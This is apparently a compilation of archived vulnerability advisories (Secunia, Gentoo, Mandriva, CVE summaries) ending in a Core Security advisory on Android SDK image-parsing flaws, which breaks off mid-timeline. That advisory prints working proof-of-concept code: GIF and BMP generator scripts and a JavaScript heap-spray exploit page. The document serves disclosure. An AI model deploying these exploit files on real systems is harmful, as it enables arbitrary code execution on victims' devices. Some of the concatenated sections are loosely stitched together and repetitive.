The Sandbox.sys driver in Outpost Firewall PRO 4.0, and possibly earlier versions, does not validate arguments to hooked SSDT functions, which allows local users to cause a denial of service (crash) via invalid arguments to the (1) NtAssignProcessToJobObject,, (2) NtCreateKey, (3) NtCreateThread, (4) NtDeleteFile, (5) NtLoadDriver, (6) NtOpenProcess, (7) NtProtectVirtualMemory, (8) NtReplaceKey, (9) NtTerminateProcess, (10) NtTerminateThread, (11) NtUnloadDriver, and (12) NtWriteVirtualMemory functions. (1) NtAssignProcessToJobObject function (2) NtCreateKey function (3) NtCreateThread function (4) NtDeleteFile function (5) NtLoadDriver function (6) NtOpenProcess function (7) NtProtectVirtualmemory function (8) NtReplaceKey function (9) NtTerminateProcess function (10) NtTerminateThread function (11) NtUnloadDriver function (12) NtWriteVirtualmemory function. Outpost Firewall PRO is prone to multiple local denial-of-service vulnerabilities because the application fails to properly handle unexpected input. Exploiting these issues allows local attackers to crash affected computers, denying service to legitimate users. Remote code-execution may be possible, but this has not been confirmed. Outpost Firewall PRO 4.0 (964.582.059) and 4.0 (971.584.079) are vulnerable to these issues; other versions may also be affected. Outpost Firewall is prone to a denial-of-service vulnerability. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. The vulnerability is caused due to an error within Sandbox.sys when handling the parameters of certain hooked functions. This can be exploited to cause a DoS by calling NtAssignProcessToJobObject, NtCreateKey, NtCreateThread, NtDeleteFile, NtLoadDriver, NtOpenProcess, NtProtectVirtualMemory, NtReplaceKey, NtTerminateProcess, NtTerminateThread, NtUnloadDriver, and NtWriteVirtualMemory with specially crafted parameters. Other versions may also be affected. SOLUTION: Restrict access to trusted users only. PROVIDED AND/OR DISCOVERED BY: Matousec Transparent Security ORIGINAL ADVISORY: Matousec Transparent Security: http://www.matousec.com/info/advisories/Outpost-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Citrix Advanced Access Control (AAC) Option 4.0, and Access Gateway 4.2 with Advanced Access Control 4.2, before 20061114, when the Browser-Only access feature is enabled, allows remote authenticated users to bypass access policies via a certain login method, a different issue than CVE-2006-4846. NOTE: some of these details are obtained from third party information. Citrix Access Gateway is prone to multiple vulnerabilities. Exploiting these issues may allow attackers to gain unauthorized access to certain resources. This BID will be updated when more details become available. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. SOLUTION: Apply hotfix AACE400W004: http://support.citrix.com/article/CTX110293 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Citrix: http://support.citrix.com/article/CTX111614 http://support.citrix.com/article/CTX111615 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Citrix Access Gateway 4.5 Advanced Edition, and 4.2 with Advanced Access Control (AAC) 4.2, when deployed on the Access Gateway appliance 4.2 through 4.2.2 allows remote authenticated users to "gain access to data" and obtain sensitive information via unspecified vectors. An attacker can exploit this issue to disclose sensitive information that may be used to gain unauthorized access to the application. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. 1) An error in the Browser-Only access feature may allow users access to certain protected resources. 2) An error in the login process may allow users access to certain protected resources. SOLUTION: Apply hotfix AACE400W004: http://support.citrix.com/article/CTX110293 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Citrix: http://support.citrix.com/article/CTX111614 http://support.citrix.com/article/CTX111615 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. PNG (Portable Network Graphics) Format image processing library libpng In png_set_sPLT() In the function sPLT In the chunk processing code section, PNG There is a problem that memory access violation occurs due to image processing.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) May be in a state. The 'libpng' graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. Attackers may exploit this vulnerability to crash an application that relies on the affected library. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libpng: Denial of Service Date: November 17, 2006 Bugs: #154380 ID: 200611-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability in libpng may allow a remote attacker to crash applications that handle untrusted images. Background ========== libpng is a free ANSI C library used to process and manipulate PNG images. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/libpng < 1.2.13 >= 1.2.13 Description =========== Tavis Ormandy of the Gentoo Linux Security Audit Team discovered that a vulnerability exists in the sPLT chunk handling code of libpng, a large sPLT chunk may cause an application to attempt to read out of bounds. Impact ====== A remote attacker could craft an image that when processed or viewed by an application using libpng causes the application to terminate abnormally. Workaround ========== There is no known workaround at this time. Resolution ========== All libpng users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.13" References ========== [ 1 ] CVE-2006-5793 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200611-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Do you need accurate and reliable IDS / IPS / AV detection rules? Get in-depth vulnerability details: http://secunia.com/binary_analysis/sample_analysis/ ---------------------------------------------------------------------- TITLE: FUJITSU Interstage Products Apache Tomcat Security Bypass SECUNIA ADVISORY ID: SA32234 VERIFY ADVISORY: http://secunia.com/advisories/32234/ CRITICAL: Not critical IMPACT: Security Bypass WHERE: >From remote SOFTWARE: Interstage Application Server 6.x http://secunia.com/advisories/product/13693/ Interstage Application Server 7.x http://secunia.com/advisories/product/13692/ Interstage Application Server 8.x http://secunia.com/advisories/product/13685/ Interstage Application Server 9.x http://secunia.com/advisories/product/15986/ Interstage Apworks 6.x http://secunia.com/advisories/product/13688/ Interstage Apworks 7.x http://secunia.com/advisories/product/13689/ Interstage Studio 8.x http://secunia.com/advisories/product/13690/ Interstage Studio 9.x http://secunia.com/advisories/product/15610/ Interstage Business Application Server 8.x http://secunia.com/advisories/product/13687/ Interstage Job Workload Server 8.x http://secunia.com/advisories/product/13686/ DESCRIPTION: A security issue has been reported in various FUJITSU Interstage products, which potentially can be exploited by malicious people to bypass certain security restrictions. The security issue is caused due to a synchronisation problem when checking IP addresses and can be exploited to bypass a filter valve that extends "RemoteFilterValve" and potentially gain access to protected contexts. SOLUTION: Patches are scheduled for release. Use a proxy or firewall to protect resources. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: FUJITSU: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html JVN: http://jvn.jp/en/jp/JVN30732239/index.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:212 http://www.mandriva.com/security/ _______________________________________________________________________ Package : doxygen Date : November 16, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-3334) It is questionable whether this issue is actually exploitable, but the patch to correct the issue has been included in versions < 1.2.12. (CVE-2006-5793) In addition, an patch to address several old vulnerabilities has been applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, CAN-2004-0598, CAN-2004-0599) Packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm Mandriva Linux 2007.0: 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm Corporate 3.0: 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm Corporate 3.0/X86_64: d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm Corporate 4.0: a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q pK8OJ2vhx3DqZ400EPH5QMw= =R8Jo -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs Multiple vulnerabilities in Google's Android SDK *Advisory Information* Title: Multiple vulnerabilities in Google's Android SDK Advisory ID: CORE-2008-0124 Advisory URL: http://www.coresecurity.com/?action=item&id=2148 Date published: 2008-03-04 Date of last update: 2008-03-04 Vendors contacted: Google Release mode: Coordinated release *Vulnerability Information* Class: Heap overflow, integer overflow Remotely Exploitable: No Locally Exploitable: No Bugtraq ID: 28006, 28005 CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 *Vulnerability Description* Android is project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007. The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing application and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5]. Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF an BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries other were introduced by native Android code that use them or that implements new functionality. Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates phone running the Android platform on an ARM microprocessor. This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit. *Vulnerable Packages* . Android SDK m3-rc37a and earlier are vulnerable several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component that process BMP images (bug #3). *Non-vulnerable Packages* . Android SDK m5-rc15 *Vendor Information, Solutions and Workarounds* Vendor statement: "The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review." *Credits* These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega. *Technical Description / Proof of Concept Code* Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack. The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats. Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system. These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-start exploitation techniques for different hardware platforms and operating systems [6]. The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component. #1 - GIF image parsing heap overflow The Graphics Interchange Format (GIF) is image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage. A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the _Logical Screen Width and Height_ filed of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8]. Detailed analysis: When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats. Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image. First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and Height_ in a structure called 'GifFileType': /----------- Int DGifGetScreenDesc(GifFileType * GifFile) { ... /* Put the screen descriptor into the file: */ if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR || DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR) return GIF_ERROR; ... } - -----------/ We can see that the fields are stored in the first 2 words of the structure: /----------- typedef struct GifFileType { /* Screen dimensions. */ GifWord SWidth, SHeight, ... } - -----------/ In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register: /----------- .text:0002F234 BL _DGifOpen .text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5 - -----------/ Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size: /----------- Int DGifSlurp(GifFileType * GifFile) { ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height; sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType)); ... } - -----------/ Afterwards the _Logical Screen_ Width and Height are stored in the R9 and R11 registers: /----------- .text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight ! - -----------/ However the actual image may be much larger that these sizes that are incorrectly passed to a number of methods of the 'GIFImageDecoder': /----------- ImageDecoder::chooseFromOneChoice(): .text:0002F294 MOV R0, R8 .text:0002F298 MOV R1, #3 .text:0002F29C MOV R2, R9 .text:0002F2A0 MOV R3, R11 .text:0002F2A4 STR R12, [SP,#0x48+var_3C] .text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int) Bitmap::setConfig(): .text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap .text:0002F2BC MOV R1, #3 .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight ! .text:0002F2C4 MOV R3, R11 .text:0002F2C8 STR R10, [SP,#0x48+var_48] .text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint) - -----------/ This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet: /----------- .text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7 .text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8 .text:00035C40 MOV R4, R0 ; $R4 = *Bitmap - -----------/ And later: /----------- .text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint) .text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes .text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth .text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight .text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes - -----------/ The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once generated the GIF file, it must be opened in the Android browser to trigger the overflow: /----------- ##Android Heap Overflow ##Ortega Alfredo _ Core Security Exploit Writers Team ##tested against Android SDK m3-rc37a import Image import struct #Creates a _good_ gif image imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF') #Shrink the Logical screen dimension SWidth=1 SHeight=1 img = open(imagename,'rb').read() img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:] #Save the _bad_ gif image q=open(imagename,'wb=""') q.write(img) q.close() - -----------/ This security bug affects Android SDK m3-rc37a and earlier versions. Version m5-rc14 of the Android SDK includes a fix and is not vulnerable to this bug. #2 - PNG image parsing, multiple vulnerabilities: The Portable Network Graphics (PNG) is a bitmapped image format that employs lossless data compression [9]. PNG was created to improve upon and replace the GIF format as an image file format that does not require a patent license. The library 'libsgl.so' used by Android's WebKit contains commonly used code to load graphic files, as libpng, giflib and others. The version inside libsgl.so distributed with Android SDK m3-rc37a and earlier versions include the string '"libpng version 1.2.8 - December 3, 2004"'. Source code inspection of the file '\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android project reveals that '"libpng version 1.2.7 - September 12, 2004"' has been used in this release. This old version of libpng makes Android SDK m3-rc37a and earlier versions vulnerable to the following known issues: ' CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 '. Android version m5-rc14 has been updated to include libpng 1.2.24 and is likely not vulnerable. #3 - BMP image processing, negative offset integer overflow: The BMP file format, sometimes called bitmap or DIB file format (for device-independent bitmap), is an image file format used to store bitmap digital images, especially on Microsoft Windows and OS/2 operating systems [10]. The integer overflow is caused when a Windows Bitmap file (.BMP) header is parsed in the method 'BMP::readFromStream(Stream *, ImageDecoder::Mode)' inside the 'libsgl.so' library. When the value of the 'offset' field of the BMP file header is negative and the Bitmap Information section (DIB header) specifies an image of 8 bits per pixel (8 bpp) the parser will try to allocate a palette, and will use the negative offset to calculate the size of the palette. The following code initializes the palette with the color white ('0x00ffffff') but with a carefully chosen negative offset it can be made to overwrite any address of the process with that value. Because the BMP decoder source wasn't released, a disassembly of the binary included by Android is provided below: /----------- .text:0002EE38 MOV LR, R7 ; R7 is the negative offset .text:0002EE3C MOV R12, R7,LSL#2 .text:0002EE40 .text:0002EE40 loc_2EE40 .text:0002EE40 LDR R3, [R10,#0x10] .text:0002EE44 ADD LR, LR, #1 .text:0002EE48 MOVL R2, 0xFFFFFFFF .text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the same bug) but ranges 0x10000-0x20000 .text:0002EE50 MOV R0, #0 .text:0002EE54 CMP LR, R9 .text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1) .text:0002EE5C STRB R2, [R1,#2] .text:0002EE60 STRB R0, [R1,#3] .text:0002EE64 STRB R2, [R1,#1] .text:0002EE68 ADD R12, R12, #4 .text:0002EE6C BNE loc_2EE40 - -----------/ Now, if let's take a look at the memory map of the Android browser: /----------- # ps ps USER PID PPID VSIZE RSS WCHAN PC NAME root 1 0 248 64 c0084edc 0000ae2c S /init root 2 0 0 0 c0049168 00000000 S kthreadd ... root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb app_0 1574 535 83564 12832 ffffffff afe0c79c S com.google.android.browser root 1600 587 840 324 00000000 afe0bfbc R ps # cat /proc/1574/maps cat /proc/1574/maps 00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process 0000a000-00c73000 rwxp 0000a000 00:00 0 [heap] 08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted) ... # - -----------/ We can see that the heap is located in the range '0000a000-00c73000' and it is executable. Overwriting this area will allow to redirect execution flow if there is a virtual table stored in the heap. Later on the same method we can see that a call to the "Stream" Object VT is made: /----------- .text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object .text:0002EB68 MOV R0, R8 .text:0002EB6C MOV LR, PC .text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10 - -----------/ Because the "Stream" Object (R8) is stored on the heap and we can fill the heap with the white color ' 0x00ffffff' we can load the Program Counter with the value at '0xffffff+0x10'. The following python script will generate a BMP to accomplish that: /----------- # This script generates a Bitmap file that makes the Android browser jump to the address at 0xffffff+0x10 # Must be loaded inside a HTML file with a tag like this: &lt;IMG src=badbmp.bmp&gt; # Alfredo Ortega - Core Security import struct offset = 0xffef0000 width = 0x0bffff height=8 bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" bmp+=struct.pack("<I",offset) bmp+="\x28\x00\x00\x00" bmp+=struct.pack("<I",width) bmp+=struct.pack("<I",height) bmp+="\x03\x00\x08\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff" bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41" bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" open("badbmp.bmp","wb").write(bmp) - -----------/ Opening the BMP file generated with this script inside a HTML page will cause (sometimes, as it is dependent on an uninitialized variable) the following output of the gdb debugger: /----------- (gdb) attach 1574 attach 1574 Attaching to program: /system/bin/app_process, process 1574 ... 0xafe0d204 in __futex_wait () from /system/lib/libc.so (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () (gdb) - -----------/ Here the browser process has jumped to the '0x00000000' address because that is the value at 0x00ffffff+0x10. We can change this value using common JavaScript heap-filling techniques. The complete exploit page follows: /----------- <HTML> <HEAD> </HEAD> <BODY> <script type="text/javascript"> // Fill 0x200000 - 0xa00000 with Breakpoints var nop = unescape("%u0001%uef9f"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<5;i++) document.write(nop) // Fill 0xa00000 - 0x1100000 with address 0x00400040 var nop = unescape("%u4000%u4000"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<2;i++) document.write(nop) </script> <IMG src=badbmp.bmp> </BODY> </HTML> - -----------/ Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff' it is very slow and the default memory configuration of Android will often abort the process before reaching the desired point. To overcome this limitation for demonstration purposes one can launch the emulator with this parameters: 'emulator -qemu -m 192' That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work. This security bug affects Android SDK m5-rc14 and earlier versions. *Report Timeline* . 2008-01-30: Vendor is notified that possibly exploitable vulnerabilities where discovered and that an advisory draft is available. This affects Android SDK m3-rc37a and earlier versions. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for the open source community, but agree they can fix the problem on the estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification. 2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been 